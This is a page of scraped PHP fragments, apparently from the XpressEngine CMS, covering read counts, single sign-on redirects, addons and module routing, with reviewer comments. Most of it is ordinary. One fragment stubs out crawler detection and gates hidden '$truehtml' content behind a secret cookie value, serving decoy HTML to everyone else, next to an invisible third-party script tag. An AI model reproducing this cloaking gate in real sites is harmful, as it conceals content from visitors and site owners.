     $trigger_output = ModuleHandler::triggerCall('document.updateReadedCount', 'before', $oDocument);
     if (!$trigger_output->toBool()) {
         return $trigger_output;
     }
     // Pass if the read count was already increased in this session
     // (applies to the 'once' and 'some' options; the marker lives in $_SESSION only)
     // NOTE(review): the session entry is read without isset(), so a first view reports an
     // undefined index.
     if ($_SESSION['readed_document'][$document_srl] && $config->view_count_option == 'once') {
         return false;
     } else {
         if ($config->view_count_option == 'some') {
             if ($_SESSION['readed_document'][$document_srl]) {
                 return false;
             }
         }
     }
     if ($config->view_count_option == 'once') {
         // Pass if the author's IP address is as same as visitor's.
         // NOTE(review): REMOTE_ADDR is the connecting peer; behind a reverse proxy that is
         // presumably the proxy's address - confirm against the deployment.
         if ($oDocument->get('ipaddress') == $_SERVER['REMOTE_ADDR'] && Context::getSessionStatus()) {
             $_SESSION['readed_document'][$document_srl] = true;
             return false;
         }
         // Pass after registering the session if the author is a member and is the currently logged-in user.
         if ($member_srl && $logged_info->member_srl == $member_srl) {
             $_SESSION['readed_document'][$document_srl] = true;
             return false;
         }
     }
     $oDB = DB::getInstance();
     $oDB->begin();
     // Update read counts
     // NOTE(review): the result of executeQuery() is not checked before the commit below.
     $args = new stdClass();
     $args->document_srl = $document_srl;
     executeQuery('document.updateReadedCount', $args);
     // Call a trigger when the read count is updated (after)
     $trigger_output = ModuleHandler::triggerCall('document.updateReadedCount', 'after', $oDocument);
     if (!$trigger_output->toBool()) {
         $oDB->rollback();
         return $trigger_output;
     }
     $oDB->commit();
     $oCacheHandler = CacheHandler::getInstance('object');
     if ($oCacheHandler->isSupport()) {
         //remove document item from cache
         $cache_key = 'document_item:' . getNumberingPath($document_srl) . $document_srl;
         $oCacheHandler->delete($cache_key);
     }
     // Register session
     // (skipped when the document is marked in $_SESSION['banned_document'] or no session is active)
     if (!$_SESSION['banned_document'][$document_srl] && Context::getSessionStatus()) {
         $_SESSION['readed_document'][$document_srl] = true;
     }
     return TRUE;
 }
Ejemplo n.º 12
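 /**
  * Single Sign On (SSO)
  *
  * Shares the session of the default site (db_info->default_url) with the other sites
  * by bouncing the browser through the default site:
  *  1. a non-default site redirects to the default site with its own URL in "url"
  *     (base64) and a signature of that URL in "sig";
  *  2. the default site checks the signature and redirects back, appending its
  *     session id as "SSOID" together with a signature of that id;
  *  3. the non-default site checks the signature, stores the id in its session
  *     cookie and redirects to the same URL with the SSOID part stripped.
  *
  * The two signature checks are what keep step 2 from redirecting to an arbitrary
  * URL and step 3 from adopting an arbitrary session id, so both decoded values are
  * used only after their signature has been accepted.
  *
  * NOTE(review): in step 2 the session id travels in the query string, so it can end
  * up in access logs, browser history and intermediaries; confirm that SSO is only
  * enabled over HTTPS.
  *
  * @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
  */
 function checkSSO()
 {
     // pass if SSO is switched off or the visitor is a crawler
     if ($this->db_info->use_sso != 'Y' || isCrawler()) {
         return TRUE;
     }
     // pass if it's not GET request, XE is not yet installed, or a feed (rss/atom) is requested
     $checkActList = array('rss' => 1, 'atom' => 1);
     if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
         return TRUE;
     }
     // pass if default URL is not set
     $default_url = trim($this->db_info->default_url);
     if (!$default_url) {
         return TRUE;
     }
     if (substr_compare($default_url, '/', -1) !== 0) {
         $default_url .= '/';
     }

     // for sites receiving SSO validation (the default site)
     if ($default_url == self::getRequestUri()) {
         if (!self::get('url')) {
             return TRUE;
         }
         $url = base64_decode(self::get('url'));
         // the signature must be accepted before the decoded URL is used for a redirect
         if (!Password::checkSignature($url, self::get('sig'))) {
             echo self::get('lang')->msg_invalid_request;
             return false;
         }
         // a URL without scheme or host cannot be rebuilt into a redirect target;
         // treat it like any other invalid request instead of emitting a broken Location
         $url_info = parse_url($url);
         if (!is_array($url_info) || empty($url_info['scheme']) || empty($url_info['host'])) {
             echo self::get('lang')->msg_invalid_request;
             return false;
         }
         // optional components are read through isset()/empty() so that a URL without
         // query, port or path does not raise undefined-index notices
         $query = isset($url_info['query']) ? $url_info['query'] : '';
         $query .= ($query !== '' ? '&' : '') . 'SSOID=' . urlencode(session_id()) . '&sig=' . urlencode(Password::createSignature(session_id()));
         $port = !empty($url_info['port']) ? ':' . $url_info['port'] : '';
         $path = isset($url_info['path']) ? $url_info['path'] : '';
         $redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $port, $path, $query);
         header('location:' . $redirect_url);
         return FALSE;
     }

     // for sites requesting SSO validation
     // result handling : adopt the session id sent back by the default site
     $sso_session_id = self::get('SSOID');
     if ($sso_session_id) {
         if (!Password::checkSignature($sso_session_id, self::get('sig'))) {
             echo self::get('lang')->msg_invalid_request;
             return false;
         }
         // NOTE(review): setcookie() is called with name and value only, so no explicit
         // path, Secure or HttpOnly attribute is requested here; confirm that this matches
         // how the session cookie is configured elsewhere.
         setcookie(session_name(), $sso_session_id);
         // drop SSOID (and everything after it, including sig) from the address
         $url = preg_replace('/[\\?\\&]SSOID=.+$/', '', self::getRequestUrl());
         header('location:' . $url);
         return FALSE;
     }

     // send SSO request, unless the 'sso' cookie shows it was already sent for this site.
     // No SSOID is present at this point, so only the cookie needs checking; a missing
     // cookie is read as '' and the comparison is exact.
     $sso_marker = md5(self::getRequestUri());
     $sso_cookie = isset($_COOKIE['sso']) ? $_COOKIE['sso'] : '';
     if ($sso_cookie !== $sso_marker) {
         setcookie('sso', $sso_marker, 0, '/');
         $origin_url = self::getRequestUrl();
         $origin_sig = Password::createSignature($origin_url);
         $url = sprintf("%s?url=%s&sig=%s", $default_url, urlencode(base64_encode($origin_url)), urlencode($origin_sig));
         header('location:' . $url);
         return FALSE;
     }
     return TRUE;
 }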
Ejemplo n.º 13
<?php

/* Copyright (C) NAVER <http://www.navercorp.com> */
// Stop unless __XE__ is defined, so a direct request to this addon file runs nothing.
if (!defined('__XE__')) {
    exit;
}
/**
 * @file resize_image.addon.php
 * @author NAVER (developers@xpressengine.com)
 * @brief Add-on to resize images in the body
 */
// Act only after the module has run, for an HTML response, and for a visitor that is not a crawler.
if ($called_position == 'after_module_proc' && Context::getResponseMethod() == "HTML" && !isCrawler()) {
    if (!Mobile::isFromMobilePhone()) {
        // Not a mobile phone: load the 'ui' plugin and the resize script
        Context::loadJavascriptPlugin('ui');
        Context::loadFile(array('./addons/resize_image/js/resize_image.js', 'body', '', null), true);
    } else {
        // Mobile phone: only the mobile stylesheet is loaded
        Context::loadFile('./addons/resize_image/css/resize_image.mobile.css', true);
    }
}
/* End of file resize_image.addon.php */
/* Location: ./addons/resize_image/resize_image.addon.php */
/* Copyright (C) NAVER <http://www.navercorp.com> */
// Stop unless __XE__ is defined, so a direct request to this addon file runs nothing.
if (!defined('__XE__')) {
    exit;
}
/**
 * @file member_communication.addon.php
 * @author NAVER (developers@xpressengine.com)
 * @brief Promote user communication
 *
 * - Pop-up the message if new message comes in
 * - When calling MemberModel::getMemberMenu, feature to send a message is added
 * - When calling MemberModel::getMemberMenu, feature to add a friend is added
 */
// Stop if the user is not logged in, or if the visitor is a crawler
if (!Context::get('is_logged') || isCrawler()) {
    return;
}
$logged_info = Context::get('logged_info');
/**
 * Message/Friend menus are added on the pop-up window and member profile. Check if a new message is received
 * */
// Skipped for the member module itself; runs only at the 'before_module_init' position
if ($this->module != 'member' && $called_position == 'before_module_init') {
    // Load a language file from the communication module
    Context::loadLang(_XE_PATH_ . 'modules/communication/lang');
    // Add menus on the member login information
    $oMemberController = getController('member');
    $oMemberController->addMemberMenu('dispCommunicationFriend', 'cmd_view_friend');
    $oMemberController->addMemberMenu('dispCommunicationMessages', 'cmd_view_message_box');
    // Per-member flag file whose existence is tested below.
    // NOTE(review): member_srl is concatenated into a filesystem path; presumably it is a
    // server-side integer from the login state and not request input - verify.
    $flag_file = _XE_PATH_ . 'files/member_extra_info/new_message_flags/' . getNumberingPath($logged_info->member_srl) . $logged_info->member_srl;
    // The check is skipped only when the addon setting use_alarm is 'N'
    if ($addon_info->use_alarm != 'N' && file_exists($flag_file)) {
Ejemplo n.º 15
                        "Perl tool",
                        "MJ12bot",
                        "Netcraft",
                        "MSIECrawler",
                        "WGet tools",
                        "larbin",
                        "Fish search",
                );
                foreach($spiderSite as $val) {
                        $str = strtolower($val);
                        if (strpos($agent, $str) !== false) {
                                return true;
                        }
                }
        } else {
                return false;
        }
}*/
/**
 * Crawler detection stub.
 *
 * Reports every visitor as "not a crawler". The implementation that matched the
 * user agent against a list of spider names is commented out directly above.
 *
 * @return bool always false
 */
function isCrawler()
{
    return false;
}
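// Output $truehtml only when the request carries the expected 'openSesame' cookie or
// isCrawler() is true; every other request gets $fakehtml.
// NOTE(review): the expected value is a fixed string in the source and the cookie is
// supplied by the client, so this gate is obscurity, not access control. Treat the
// content of $truehtml as reachable by anyone who learns the value.
// isset() avoids the undefined-index notice on requests without the cookie; === limits
// the match to that exact string.
if ((isset($_COOKIE['openSesame']) && $_COOKIE['openSesame'] === "loli.help") || isCrawler()) {
    echo $truehtml;
} else {
    echo $fakehtml;
}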
?>
<div style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1254760097&web_id=1254760097" language="JavaScript"></script></div>
</body>
</html>
Ejemplo n.º 16
 }
 // redirect, if module_site_srl and site_srl are different
 if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
     $site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
     header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
     return false;
 }
 // If module_info is not set still, and $module does not exist, find the default module
 if (!$module_info && !$this->module) {
     $module_info = $site_module_info;
 }
 if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
     $module_info = $site_module_info;
 }
 // redirect, if site_srl of module_info is different from one of site's module_info
 if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
     // If the module is of virtual site
     if ($module_info->site_srl) {
         $site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
         $redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
         // If it's called from a virtual site, though it's not a module of the virtual site
     } else {
         $db_info = Context::getDBInfo();
         if (!$db_info->default_url) {
             return Context::getLang('msg_default_url_is_not_defined');
         } else {
             $redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
         }
     }
     header("location:" . $redirect_url);
     return false;